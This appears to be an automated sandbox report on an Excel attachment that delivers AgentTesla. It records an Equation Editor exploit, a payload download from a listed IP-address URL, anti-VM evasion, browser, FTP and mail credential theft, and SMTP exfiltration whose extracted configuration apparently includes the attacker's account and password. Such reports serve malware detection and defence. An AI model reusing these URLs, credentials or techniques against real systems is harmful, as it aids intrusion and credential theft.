Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: ORDER 9387383900.xlsx

Stream path 'EncryptedPackage' entropy: 7.99934422624 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 9145			Jump to behavior
Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 600			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 260	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2892	Thread sleep time: -100778s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1616	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1900	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1192	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1192	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1840	Thread sleep count: 9145 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1840	Thread sleep count: 600 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1192	Thread sleep count: 92 > 30	Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 100778	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior

Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3662578.5.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3662578.5.raw.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.23.213.61	unknown	United States		36352	AS-COLOCROSSINGUS	true
208.91.199.225	us2.smtp.mailhostbox.com	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	false

Contacted Domains

Name	IP	Active
us2.smtp.mailhostbox.com	208.91.199.225	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.23.213.61/rrr.exe	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://198.23.213.61/rrr.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 5.2.vbc.exe.400000.1.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "razilogs@razilogs.comDANIEL3116us2.smtp.mailhostbox.com"}

Multi AV Scanner detection for submitted file

Source: ORDER 9387383900.xlsx

Virustotal: Detection: 33%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe

Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

4_2_006684D8

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: us2.smtp.mailhostbox.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.213.61:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.213.61:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 208.91.199.225:587

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.91.199.225 208.91.199.225

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C9F6B5.emf

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: us2.smtp.mailhostbox.com

Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: http://htJAdA.com
Source: vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2152952419.00000000025C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2346025048.0000000002598000.00000004.00000001.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: F3AA532.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000005.00000002.2345938081.00000000024DA000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000005.00000002.2345994356.000000000255A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2346039166.00000000025A9000.00000004.00000001.sdmp	String found in binary or memory: https://bfdUomDwe8FRPCAbrg.com
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing from the 18 . yellow bar above 19 This document is 20 protected 3. Once you have e
Source: Screenshot number: 4	Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"'""' 27 28 0 29 . 30 31
Source: Screenshot number: 8	Screenshot OCR: Enable Editing from the 18 . yellow bar above 19 This document is 20 protected 3. Once you have e
Source: Screenshot number: 8	Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"'""' 27 28 0 29 . 30 31
Source: Screenshot number: 12	Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"''"' 27 28 . 29 30

.NET source code contains very large array initializations

